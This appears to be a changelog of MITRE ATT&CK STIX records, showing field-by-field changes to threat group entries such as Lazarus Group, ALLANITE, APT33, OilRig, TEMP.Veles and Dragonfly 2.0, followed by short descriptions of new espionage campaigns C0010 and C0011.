x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
external_referenceshttps://blogs.microsoft.com/on-the-issues/2017/12/19/microsoft-facebook-disrupt-zinc-malware-attack-protect-customers-internet-ongoing-cyberthreats/
values_changed
STIX FieldOld valueNew Value
modified2021-10-14 22:04:58.182000+00:002022-08-23 15:30:44.196000+00:00
external_references[1]['source_name']Lazarus GroupLabyrinth Chollima
external_references[1]['description'](Citation: Novetta Blockbuster)(Citation: CrowdStrike Labyrinth Chollima Feb 2022)
external_references[2]['source_name']HIDDEN COBRAZINC
external_references[2]['description']The U.S. Government refers to malicious cyber activity by the North Korean government as HIDDEN COBRA.(Citation: US-CERT HIDDEN COBRA June 2017)(Citation: US-CERT HOPLIGHT Apr 2019)(Citation: Microsoft ZINC disruption Dec 2017)
external_references[3]['source_name']Guardians of PeaceLazarus Group
external_references[3]['description'](Citation: US-CERT HIDDEN COBRA June 2017)(Citation: Novetta Blockbuster)
external_references[4]['source_name']ZINCNICKEL ACADEMY
external_references[4]['description'](Citation: Microsoft ZINC disruption Dec 2017)(Citation: Secureworks NICKEL ACADEMY Dec 2017)
external_references[5]['source_name']NICKEL ACADEMYGuardians of Peace
external_references[5]['description'](Citation: Secureworks NICKEL ACADEMY Dec 2017)(Citation: US-CERT HIDDEN COBRA June 2017)
external_references[6]['source_name']US-CERT HIDDEN COBRA June 2017CrowdStrike Labyrinth Chollima Feb 2022
external_references[6]['description']US-CERT. (2017, June 13). Alert (TA17-164A) HIDDEN COBRA – North Korea’s DDoS Botnet Infrastructure. Retrieved July 13, 2017.CrowdStrike. (2022, February 1). CrowdStrike Adversary Labyrinth Chollima. Retrieved February 1, 2022.
external_references[6]['url']https://www.us-cert.gov/ncas/alerts/TA17-164Ahttps://adversary.crowdstrike.com/en-US/adversary/labyrinth-chollima/
external_references[7]['source_name']Treasury North Korean Cyber Groups September 2019Novetta Blockbuster
external_references[7]['description']US Treasury . (2019, September 13). Treasury Sanctions North Korean State-Sponsored Malicious Cyber Groups. Retrieved September 29, 2021.Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February 25, 2016.
external_references[7]['url']https://home.treasury.gov/news/press-releases/sm774https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf
external_references[8]['source_name']Novetta BlockbusterSecureworks NICKEL ACADEMY Dec 2017
external_references[8]['description']Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February 25, 2016.Secureworks. (2017, December 15). Media Alert - Secureworks Discovers North Korean Cyber Threat Group, Lazarus, Spearphishing Financial Executives of Cryptocurrency Companies. Retrieved December 27, 2017.
external_references[8]['url']https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdfhttps://www.secureworks.com/about/press/media-alert-secureworks-discovers-north-korean-cyber-threat-group-lazarus-spearphishing
external_references[9]['source_name']US-CERT HOPLIGHT Apr 2019Microsoft ZINC disruption Dec 2017
external_references[9]['description']US-CERT. (2019, April 10). MAR-10135536-8 – North Korean Trojan: HOPLIGHT. Retrieved April 19, 2019.Smith, B. (2017, December 19). Microsoft and Facebook disrupt ZINC malware attack to protect customers and the internet from ongoing cyberthreats. Retrieved December 20, 2017.
external_references[9]['url']https://www.us-cert.gov/ncas/analysis-reports/AR19-100Ahttps://blogs.microsoft.com/on-the-issues/2017/12/19/microsoft-facebook-disrupt-zinc-malware-attack-protect-customers-internet-ongoing-cyberthreats/
external_references[10]['source_name']Microsoft ZINC disruption Dec 2017HIDDEN COBRA
external_references[10]['description']Smith, B. (2017, December 19). Microsoft and Facebook disrupt ZINC malware attack to protect customers and the internet from ongoing cyberthreats. Retrieved December 20, 2017.The U.S. Government refers to malicious cyber activity by the North Korean government as HIDDEN COBRA.(Citation: US-CERT HIDDEN COBRA June 2017)(Citation: US-CERT HOPLIGHT Apr 2019)
external_references[11]['source_name']Secureworks NICKEL ACADEMY Dec 2017Treasury North Korean Cyber Groups September 2019
external_references[11]['description']Secureworks. (2017, December 15). Media Alert - Secureworks Discovers North Korean Cyber Threat Group, Lazarus, Spearphishing Financial Executives of Cryptocurrency Companies. Retrieved December 27, 2017.US Treasury . (2019, September 13). Treasury Sanctions North Korean State-Sponsored Malicious Cyber Groups. Retrieved September 29, 2021.
external_references[11]['url']https://www.secureworks.com/about/press/media-alert-secureworks-discovers-north-korean-cyber-threat-group-lazarus-spearphishinghttps://home.treasury.gov/news/press-releases/sm774
x_mitre_version2.03.1
iterable_item_added
STIX FieldOld valueNew Value
aliasesLabyrinth Chollima
external_references{'source_name': 'US-CERT HIDDEN COBRA June 2017', 'description': 'US-CERT. (2017, June 13). Alert (TA17-164A) HIDDEN COBRA – North Korea’s DDoS Botnet Infrastructure. Retrieved July 13, 2017.', 'url': 'https://www.us-cert.gov/ncas/alerts/TA17-164A'}
external_references{'source_name': 'US-CERT HOPLIGHT Apr 2019', 'description': 'US-CERT. (2019, April 10). MAR-10135536-8 – North Korean Trojan: HOPLIGHT. Retrieved April 19, 2019.', 'url': 'https://www.us-cert.gov/ncas/analysis-reports/AR19-100A'}
Metadata-only Changes

[G1000] ALLANITE

Current version: 1.0


Old Description
New Description
t1[ALLANITE](https://collaborate.mitre.org/attackics/index.phpt1[ALLANITE](https://attack.mitre.org/groups/G1000) is a suspe
>/Group/G0009) is a suspected Russian cyber espionage group, >cted Russian cyber espionage group, that has primarily targe
>that has primarily targeted the electric utility sector with>ted the electric utility sector within the United States and
>in the United States and United Kingdom. The group's tactics> United Kingdom. The group's tactics and techniques are repo
> and techniques are reportedly similar to [Dragonfly](https:>rtedly similar to [Dragonfly](https://attack.mitre.org/group
>//collaborate.mitre.org/attackics/index.php/Group/G0002) / [>s/G0035), although [ALLANITE](https://attack.mitre.org/group
>Dragonfly 2.0](https://collaborate.mitre.org/attackics/index>s/G1000)s technical capabilities have not exhibited disrupti
>.php/Group/G0006), although ALLANITE’s technical capabilitie>ve or destructive abilities. It has been suggested that the 
>s have not exhibited disruptive or destructive abilities. It>group maintains a presence in ICS for the purpose of gaining
> has been suggested that the group maintains a presence in I> understanding of processes and to maintain persistence. (Ci
>CS for the purpose of gaining understanding of processes and>tation: Dragos)
> to maintain persistence. (Citation: Dragos ALLANITE) 
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_contributors['Dragos Threat Intelligence']
x_mitre_deprecatedFalse
x_mitre_domains['ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referenceshttps://dragos.com/resource/allanite/
values_changed
STIX FieldOld valueNew Value
modified2020-01-05 23:05:19.419000+00:002022-05-24 19:26:10.721000+00:00
description[ALLANITE](https://collaborate.mitre.org/attackics/index.php/Group/G0009) is a suspected Russian cyber espionage group, that has primarily targeted the electric utility sector within the United States and United Kingdom. The group's tactics and techniques are reportedly similar to [Dragonfly](https://collaborate.mitre.org/attackics/index.php/Group/G0002) / [Dragonfly 2.0](https://collaborate.mitre.org/attackics/index.php/Group/G0006), although ALLANITE’s technical capabilities have not exhibited disruptive or destructive abilities. It has been suggested that the group maintains a presence in ICS for the purpose of gaining understanding of processes and to maintain persistence. (Citation: Dragos ALLANITE)[ALLANITE](https://attack.mitre.org/groups/G1000) is a suspected Russian cyber espionage group, that has primarily targeted the electric utility sector within the United States and United Kingdom. The group's tactics and techniques are reportedly similar to [Dragonfly](https://attack.mitre.org/groups/G0035), although [ALLANITE](https://attack.mitre.org/groups/G1000)s technical capabilities have not exhibited disruptive or destructive abilities. It has been suggested that the group maintains a presence in ICS for the purpose of gaining understanding of processes and to maintain persistence. (Citation: Dragos)
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Group/G0009https://attack.mitre.org/groups/G1000
external_references[1]['source_name']ALLANITEDragos
external_references[1]['description'](Citation: Dragos ALLANITE)Dragos Allanite Retrieved. 2019/10/27
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'Dragos ALLANITE', 'description': 'Dragon. (n.d.). Allanite. Retrieved October 27, 2019', 'url': 'https://www.dragos.com/threat/allanite/'}

[G0064] APT33

Current version: 1.4

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_contributors['Dragos Threat Intelligence']
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack', 'ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-05-26 12:40:42.907000+00:002022-05-23 21:22:08.170000+00:00
external_references[4]['source_name']FireEye APT33 Sept 2017FireEye APT33 Webinar Sept 2017
external_references[4]['description']O'Leary, J., et al. (2017, September 20). Insights into Iranian Cyber Espionage: APT33 Targets Aerospace and Energy Sectors and has Ties to Destructive Malware. Retrieved February 15, 2018.Davis, S. and Carr, N. (2017, September 21). APT33: New Insights into Iranian Cyber Espionage Group. Retrieved February 15, 2018.
external_references[4]['url']https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.htmlhttps://www.brighttalk.com/webcast/10703/275683
external_references[5]['source_name']FireEye APT33 Webinar Sept 2017Microsoft Holmium June 2020
external_references[5]['description']Davis, S. and Carr, N. (2017, September 21). APT33: New Insights into Iranian Cyber Espionage Group. Retrieved February 15, 2018.Microsoft Threat Protection Intelligence Team. (2020, June 18). Inside Microsoft Threat Protection: Mapping attack chains from cloud to endpoint. Retrieved June 22, 2020.
external_references[5]['url']https://www.brighttalk.com/webcast/10703/275683https://www.microsoft.com/security/blog/2020/06/18/inside-microsoft-threat-protection-mapping-attack-chains-from-cloud-to-endpoint/
external_references[6]['source_name']Microsoft Holmium June 2020FireEye APT33 Sept 2017
external_references[6]['description']Microsoft Threat Protection Intelligence Team. (2020, June 18). Inside Microsoft Threat Protection: Mapping attack chains from cloud to endpoint. Retrieved June 22, 2020.O'Leary, J., et al. (2017, September 20). Insights into Iranian Cyber Espionage: APT33 Targets Aerospace and Energy Sectors and has Ties to Destructive Malware. Retrieved February 15, 2018.
external_references[6]['url']https://www.microsoft.com/security/blog/2020/06/18/inside-microsoft-threat-protection-mapping-attack-chains-from-cloud-to-endpoint/https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html

[G0049] OilRig

Current version: 3.0


Old Description
New Description
t1[OilRig](https://attack.mitre.org/groups/G0049) is a suspectt1[OilRig](https://attack.mitre.org/groups/G0049) is a suspect
>ed Iranian threat group that has targeted Middle Eastern and>ed Iranian threat group that has targeted Middle Eastern and
> international victims since at least 2014. The group has ta> international victims since at least 2014. The group has ta
>rgeted a variety of sectors, including financial, government>rgeted a variety of sectors, including financial, government
>, energy, chemical, and telecommunications. It appears the g>, energy, chemical, and telecommunications. It appears the g
>roup carries out supply chain attacks, leveraging the trust >roup carries out supply chain attacks, leveraging the trust 
>relationship between organizations to attack their primary t>relationship between organizations to attack their primary t
>argets. FireEye assesses that the group works on behalf of t>argets. FireEye assesses that the group works on behalf of t
>he Iranian government based on infrastructure details that c>he Iranian government based on infrastructure details that c
>ontain references to Iran, use of Iranian infrastructure, an>ontain references to Iran, use of Iranian infrastructure, an
>d targeting that aligns with nation-state interests. (Citati>d targeting that aligns with nation-state interests.(Citatio
>on: Palo Alto OilRig April 2017) (Citation: ClearSky OilRig >n: Palo Alto OilRig April 2017)(Citation: ClearSky OilRig Ja
>Jan 2017) (Citation: Palo Alto OilRig May 2016) (Citation: P>n 2017)(Citation: Palo Alto OilRig May 2016)(Citation: Palo 
>alo Alto OilRig Oct 2016) (Citation: Unit 42 Playbook Dec 20>Alto OilRig Oct 2016)(Citation: Unit 42 Playbook Dec 2017)(C
>17) (Citation: FireEye APT34 Dec 2017)(Citation: Unit 42 QUA>itation: FireEye APT34 Dec 2017)(Citation: Unit 42 QUADAGENT
>DAGENT July 2018)> July 2018)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack', 'ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referenceshttps://research.checkpoint.com/2021/irans-apt34-returns-with-an-updated-arsenal/
dictionary_item_removed
STIX FieldOld valueNew Value
external_referenceshttps://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-november-helix-kitten/
values_changed
STIX FieldOld valueNew Value
modified2021-10-15 22:04:08.941000+00:002022-06-02 20:18:52.733000+00:00
description[OilRig](https://attack.mitre.org/groups/G0049) is a suspected Iranian threat group that has targeted Middle Eastern and international victims since at least 2014. The group has targeted a variety of sectors, including financial, government, energy, chemical, and telecommunications. It appears the group carries out supply chain attacks, leveraging the trust relationship between organizations to attack their primary targets. FireEye assesses that the group works on behalf of the Iranian government based on infrastructure details that contain references to Iran, use of Iranian infrastructure, and targeting that aligns with nation-state interests. (Citation: Palo Alto OilRig April 2017) (Citation: ClearSky OilRig Jan 2017) (Citation: Palo Alto OilRig May 2016) (Citation: Palo Alto OilRig Oct 2016) (Citation: Unit 42 Playbook Dec 2017) (Citation: FireEye APT34 Dec 2017)(Citation: Unit 42 QUADAGENT July 2018)[OilRig](https://attack.mitre.org/groups/G0049) is a suspected Iranian threat group that has targeted Middle Eastern and international victims since at least 2014. The group has targeted a variety of sectors, including financial, government, energy, chemical, and telecommunications. It appears the group carries out supply chain attacks, leveraging the trust relationship between organizations to attack their primary targets. FireEye assesses that the group works on behalf of the Iranian government based on infrastructure details that contain references to Iran, use of Iranian infrastructure, and targeting that aligns with nation-state interests.(Citation: Palo Alto OilRig April 2017)(Citation: ClearSky OilRig Jan 2017)(Citation: Palo Alto OilRig May 2016)(Citation: Palo Alto OilRig Oct 2016)(Citation: Unit 42 Playbook Dec 2017)(Citation: FireEye APT34 Dec 2017)(Citation: Unit 42 QUADAGENT July 2018)
aliases[3]HELIX KITTENAPT34
aliases[4]APT34Helix Kitten
external_references[1]['source_name']OilRigIRN2
external_references[1]['description'](Citation: Palo Alto OilRig April 2017) (Citation: ClearSky OilRig Jan 2017) (Citation: Palo Alto OilRig May 2016) (Citation: Palo Alto OilRig Oct 2016) (Citation: Unit 42 Playbook Dec 2017) (Citation: Unit 42 QUADAGENT July 2018)(Citation: Crowdstrike Helix Kitten Nov 2018)
external_references[2]['source_name']COBALT GYPSYOilRig
external_references[2]['description'](Citation: Secureworks COBALT GYPSY Threat Profile)(Citation: Palo Alto OilRig April 2017) (Citation: ClearSky OilRig Jan 2017) (Citation: Palo Alto OilRig May 2016) (Citation: Palo Alto OilRig Oct 2016) (Citation: Unit 42 Playbook Dec 2017) (Citation: Unit 42 QUADAGENT July 2018)
external_references[3]['source_name']IRN2COBALT GYPSY
external_references[3]['description'](Citation: Crowdstrike Helix Kitten Nov 2018)(Citation: Secureworks COBALT GYPSY Threat Profile)
external_references[4]['source_name']HELIX KITTENHelix Kitten
external_references[5]['source_name']APT34Check Point APT34 April 2021
external_references[5]['description']This group was previously tracked under two distinct groups, APT34 and OilRig, but was combined due to additional reporting giving higher confidence about the overlap of the activity. (Citation: Unit 42 QUADAGENT July 2018) (Citation: FireEye APT34 Dec 2017)(Citation: Check Point APT34 April 2021)Check Point. (2021, April 8). Iran’s APT34 Returns with an Updated Arsenal. Retrieved May 5, 2021.
external_references[6]['source_name']Palo Alto OilRig April 2017ClearSky OilRig Jan 2017
external_references[6]['description']Falcone, R.. (2017, April 27). OilRig Actors Provide a Glimpse into Development and Testing Efforts. Retrieved May 3, 2017.ClearSky Cybersecurity. (2017, January 5). Iranian Threat Agent OilRig Delivers Digitally Signed Malware, Impersonates University of Oxford. Retrieved May 3, 2017.
external_references[6]['url']http://researchcenter.paloaltonetworks.com/2017/04/unit42-oilrig-actors-provide-glimpse-development-testing-efforts/http://www.clearskysec.com/oilrig/
external_references[7]['source_name']ClearSky OilRig Jan 2017Palo Alto OilRig May 2016
external_references[7]['description']ClearSky Cybersecurity. (2017, January 5). Iranian Threat Agent OilRig Delivers Digitally Signed Malware, Impersonates University of Oxford. Retrieved May 3, 2017.Falcone, R. and Lee, B.. (2016, May 26). The OilRig Campaign: Attacks on Saudi Arabian Organizations Deliver Helminth Backdoor. Retrieved May 3, 2017.
external_references[7]['url']http://www.clearskysec.com/oilrig/http://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/
external_references[8]['source_name']Palo Alto OilRig May 2016Palo Alto OilRig April 2017
external_references[8]['description']Falcone, R. and Lee, B.. (2016, May 26). The OilRig Campaign: Attacks on Saudi Arabian Organizations Deliver Helminth Backdoor. Retrieved May 3, 2017.Falcone, R.. (2017, April 27). OilRig Actors Provide a Glimpse into Development and Testing Efforts. Retrieved May 3, 2017.
external_references[8]['url']http://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/http://researchcenter.paloaltonetworks.com/2017/04/unit42-oilrig-actors-provide-glimpse-development-testing-efforts/
external_references[10]['source_name']Unit 42 Playbook Dec 2017Unit 42 QUADAGENT July 2018
external_references[10]['description']Unit 42. (2017, December 15). Unit 42 Playbook Viewer. Retrieved December 20, 2017.Lee, B., Falcone, R. (2018, July 25). OilRig Targets Technology Service Provider and Government Agency with QUADAGENT. Retrieved August 9, 2018.
external_references[10]['url']https://pan-unit42.github.io/playbook_viewer/https://researchcenter.paloaltonetworks.com/2018/07/unit42-oilrig-targets-technology-service-provider-government-agency-quadagent/
external_references[11]['source_name']FireEye APT34 Dec 2017Crowdstrike Helix Kitten Nov 2018
external_references[11]['description']Sardiwal, M, et al. (2017, December 7). New Targeted Attack in the Middle East by APT34, a Suspected Iranian Threat Group, Using CVE-2017-11882 Exploit. Retrieved December 20, 2017.Meyers, A. (2018, November 27). Meet CrowdStrike’s Adversary of the Month for November: HELIX KITTEN. Retrieved December 18, 2018.
external_references[11]['url']https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.htmlhttps://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-november-helix-kitten/
external_references[12]['source_name']Unit 42 QUADAGENT July 2018FireEye APT34 Dec 2017
external_references[12]['description']Lee, B., Falcone, R. (2018, July 25). OilRig Targets Technology Service Provider and Government Agency with QUADAGENT. Retrieved August 9, 2018.Sardiwal, M, et al. (2017, December 7). New Targeted Attack in the Middle East by APT34, a Suspected Iranian Threat Group, Using CVE-2017-11882 Exploit. Retrieved December 20, 2017.
external_references[12]['url']https://researchcenter.paloaltonetworks.com/2018/07/unit42-oilrig-targets-technology-service-provider-government-agency-quadagent/https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html
external_references[14]['source_name']Crowdstrike Helix Kitten Nov 2018APT34
external_references[14]['description']Meyers, A. (2018, November 27). Meet CrowdStrike’s Adversary of the Month for November: HELIX KITTEN. Retrieved December 18, 2018.This group was previously tracked under two distinct groups, APT34 and OilRig, but was combined due to additional reporting giving higher confidence about the overlap of the activity. (Citation: Unit 42 QUADAGENT July 2018) (Citation: FireEye APT34 Dec 2017)(Citation: Check Point APT34 April 2021)
external_references[15]['source_name']Check Point APT34 April 2021Unit 42 Playbook Dec 2017
external_references[15]['description']Check Point. (2021, April 8). Iran’s APT34 Returns with an Updated Arsenal. Retrieved May 5, 2021.Unit 42. (2017, December 15). Unit 42 Playbook Viewer. Retrieved December 20, 2017.
external_references[15]['url']https://research.checkpoint.com/2021/irans-apt34-returns-with-an-updated-arsenal/https://pan-unit42.github.io/playbook_viewer/
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_contributorsDragos Threat Intelligence

[G0088] TEMP.Veles

Current version: 1.3

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_contributors['Dragos Threat Intelligence']
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack', 'ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referenceshttps://dragos.com/resource/xenotime/
dictionary_item_removed
STIX FieldOld valueNew Value
external_referenceshttps://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html
values_changed
STIX FieldOld valueNew Value
modified2021-10-17 14:49:09.631000+00:002022-05-24 16:22:20.856000+00:00
external_references[2]['source_name']XENOTIMEDragos Xenotime 2018
external_references[2]['description']The activity group XENOTIME, as defined by Dragos, has overlaps with activity reported upon by FireEye about TEMP.Veles as well as the actors behind TRITON .(Citation: Dragos Xenotime 2018)(Citation: Pylos Xenotime 2019)(Citation: FireEye TRITON 2019)(Citation: FireEye TEMP.Veles 2018 )Dragos, Inc.. (n.d.). Xenotime. Retrieved April 16, 2019.
external_references[3]['source_name']FireEye TRITON 2019FireEye TEMP.Veles 2018
external_references[3]['description']Miller, S, et al. (2019, April 10). TRITON Actor TTP Profile, Custom Attack Tools, Detections, and ATT&CK Mapping. Retrieved April 16, 2019.FireEye Intelligence . (2018, October 23). TRITON Attribution: Russian Government-Owned Lab Most Likely Built Custom Intrusion Tools for TRITON Attackers. Retrieved April 16, 2019.
external_references[3]['url']https://www.fireeye.com/blog/threat-research/2019/04/triton-actor-ttp-profile-custom-attack-tools-detections.htmlhttps://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html
external_references[4]['source_name']FireEye TEMP.Veles 2018FireEye TEMP.Veles 2018
external_references[5]['source_name']FireEye TEMP.Veles JSON April 2019FireEye TRITON 2019
external_references[5]['description']Miller, S., et al. (2019, April 10). TRITON Appendix C. Retrieved April 29, 2019.Miller, S, et al. (2019, April 10). TRITON Actor TTP Profile, Custom Attack Tools, Detections, and ATT&CK Mapping. Retrieved April 16, 2019.
external_references[5]['url']https://www.fireeye.com/content/dam/fireeye-www/blog/files/TRITON_Appendix_C.htmlhttps://www.fireeye.com/blog/threat-research/2019/04/triton-actor-ttp-profile-custom-attack-tools-detections.html
external_references[6]['source_name']Dragos Xenotime 2018FireEye TEMP.Veles JSON April 2019
external_references[6]['description']Dragos, Inc.. (n.d.). Xenotime. Retrieved April 16, 2019.Miller, S., et al. (2019, April 10). TRITON Appendix C. Retrieved April 29, 2019.
external_references[6]['url']https://dragos.com/resource/xenotime/https://www.fireeye.com/content/dam/fireeye-www/blog/files/TRITON_Appendix_C.html
external_references[8]['source_name']FireEye TEMP.Veles 2018 XENOTIME
external_references[8]['description']FireEye Intelligence . (2018, October 23). TRITON Attribution: Russian Government-Owned Lab Most Likely Built Custom Intrusion Tools for TRITON Attackers. Retrieved April 16, 2019.The activity group XENOTIME, as defined by Dragos, has overlaps with activity reported upon by FireEye about TEMP.Veles as well as the actors behind [TRITON](https://attack.mitre.org/software/S0609) .(Citation: Dragos Xenotime 2018)(Citation: Pylos Xenotime 2019)(Citation: FireEye TRITON 2019)(Citation: FireEye TEMP.Veles 2018 )
Revocations

[G0074] Dragonfly 2.0

Current version: 2.1

Description: [Dragonfly 2.0](https://attack.mitre.org/groups/G0074) is a suspected Russian group that has targeted government entities and multiple U.S. critical infrastructure sectors since at least December 2015. (Citation: US-CERT TA18-074A) (Citation: Symantec Dragonfly Sept 2017) There is debate over the extent of overlap between [Dragonfly 2.0](https://attack.mitre.org/groups/G0074) and [Dragonfly](https://attack.mitre.org/groups/G0035), but there is sufficient evidence to lead to these being tracked as two separate groups. (Citation: Fortune Dragonfly 2.0 Sept 2017)(Citation: Dragos DYMALLOY )

This object has been revoked by [G0035] Dragonfly

Description for [G0035] Dragonfly: [Dragonfly](https://attack.mitre.org/groups/G0035) is a cyber espionage group that has been attributed to Russia's Federal Security Service (FSB) Center 16.(Citation: DOJ Russia Targeting Critical Infrastructure March 2022)(Citation: UK GOV FSB Factsheet April 2022) Active since at least 2010, [Dragonfly](https://attack.mitre.org/groups/G0035) has targeted defense and aviation companies, government entities, companies related to industrial control systems, and critical infrastructure sectors worldwide through supply chain, spearphishing, and drive-by compromise attacks.(Citation: Symantec Dragonfly)(Citation: Secureworks IRON LIBERTY July 2019)(Citation: Symantec Dragonfly Sept 2017)(Citation: Fortune Dragonfly 2.0 Sept 2017)(Citation: Gigamon Berserk Bear October 2021)(Citation: CISA AA20-296A Berserk Bear December 2020)(Citation: Symantec Dragonfly 2.0 October 2017)

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack', 'ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-14 20:07:00.932000+00:002022-05-11 14:00:00.188000+00:00
revokedFalseTrue
external_references[1]['source_name']Dragonfly 2.0DYMALLOY
external_references[1]['description'](Citation: US-CERT TA18-074A) (Citation: Symantec Dragonfly Sept 2017) (Citation: Fortune Dragonfly 2.0 Sept 2017)(Citation: Dragos DYMALLOY )
external_references[2]['source_name']IRON LIBERTYBerserk Bear
external_references[2]['description'](Citation: Secureworks MCMD July 2019)(Citation: Secureworks IRON LIBERTY)(Citation: Fortune Dragonfly 2.0 Sept 2017)
external_references[3]['source_name']DYMALLOYIRON LIBERTY
external_references[3]['description'](Citation: Dragos DYMALLOY )(Citation: Secureworks MCMD July 2019)(Citation: Secureworks IRON LIBERTY)
external_references[4]['source_name']Berserk BearDragonfly 2.0
external_references[4]['description'](Citation: Fortune Dragonfly 2.0 Sept 2017)(Citation: US-CERT TA18-074A) (Citation: Symantec Dragonfly Sept 2017) (Citation: Fortune Dragonfly 2.0 Sept 2017)
external_references[5]['source_name']US-CERT TA18-074ADragos DYMALLOY
external_references[5]['description']US-CERT. (2018, March 16). Alert (TA18-074A): Russian Government Cyber Activity Targeting Energy and Other Critical Infrastructure Sectors. Retrieved June 6, 2018.Dragos. (n.d.). DYMALLOY. Retrieved August 20, 2020.
external_references[5]['url']https://www.us-cert.gov/ncas/alerts/TA18-074Ahttps://www.dragos.com/threat/dymalloy/
external_references[6]['source_name']Symantec Dragonfly Sept 2017Fortune Dragonfly 2.0 Sept 2017
external_references[6]['description']Symantec Security Response. (2017, September 6). Dragonfly: Western energy sector targeted by sophisticated attack group. Retrieved September 9, 2017.Hackett, R. (2017, September 6). Hackers Have Penetrated Energy Grid, Symantec Warns. Retrieved June 6, 2018.
external_references[6]['url']https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-grouphttp://fortune.com/2017/09/06/hack-energy-grid-symantec/
external_references[7]['source_name']Fortune Dragonfly 2.0 Sept 2017Secureworks MCMD July 2019
external_references[7]['description']Hackett, R. (2017, September 6). Hackers Have Penetrated Energy Grid, Symantec Warns. Retrieved June 6, 2018.Secureworks. (2019, July 24). MCMD Malware Analysis. Retrieved August 13, 2020.
external_references[7]['url']http://fortune.com/2017/09/06/hack-energy-grid-symantec/https://www.secureworks.com/research/mcmd-malware-analysis
external_references[8]['source_name']Dragos DYMALLOY Secureworks IRON LIBERTY
external_references[8]['description']Dragos. (n.d.). DYMALLOY. Retrieved August 20, 2020.Secureworks. (n.d.). IRON LIBERTY. Retrieved October 15, 2020.
external_references[8]['url']https://www.dragos.com/threat/dymalloy/https://www.secureworks.com/research/threat-profiles/iron-liberty
external_references[9]['source_name']Secureworks MCMD July 2019Symantec Dragonfly Sept 2017
external_references[9]['description']Secureworks. (2019, July 24). MCMD Malware Analysis. Retrieved August 13, 2020.Symantec Security Response. (2017, September 6). Dragonfly: Western energy sector targeted by sophisticated attack group. Retrieved September 9, 2017.
external_references[9]['url']https://www.secureworks.com/research/mcmd-malware-analysishttps://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group
external_references[10]['source_name']Secureworks IRON LIBERTYUS-CERT TA18-074A
external_references[10]['description']Secureworks. (n.d.). IRON LIBERTY. Retrieved October 15, 2020.US-CERT. (2018, March 16). Alert (TA18-074A): Russian Government Cyber Activity Targeting Energy and Other Critical Infrastructure Sectors. Retrieved June 6, 2018.
external_references[10]['url']https://www.secureworks.com/research/threat-profiles/iron-libertyhttps://www.us-cert.gov/ncas/alerts/TA18-074A

Campaigns

enterprise-attack

New Campaigns

[C0010] C0010

Current version: 1.0

Description: [C0010](https://attack.mitre.org/campaigns/C0010) was a cyber espionage campaign conducted by UNC3890 that targeted Israeli shipping, government, aviation, energy, and healthcare organizations. Security researcher assess UNC3890 conducts operations in support of Iranian interests, and noted several limited technical connections to Iran, including PDB strings and Farsi language artifacts. [C0010](https://attack.mitre.org/campaigns/C0010) began by at least late 2020, and was still ongoing as of mid-2022.(Citation: Mandiant UNC3890 Aug 2022)


[C0011] C0011

Current version: 1.0

Description: [C0011](https://attack.mitre.org/campaigns/C0011) was a suspected cyber espionage campaign conducted by [Transparent Tribe](https://attack.mitre.org/groups/G0134) that targeted students at universities and colleges in India. Security researchers noted this campaign against students was a significant shift from [Transparent Tribe](https://attack.mitre.org/groups/G0134)'s historic targeting Indian government, military, and think tank personnel, and assessed it was still ongoing as of July 2022.(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022)


[C0015] C0015

Current version: 1.0

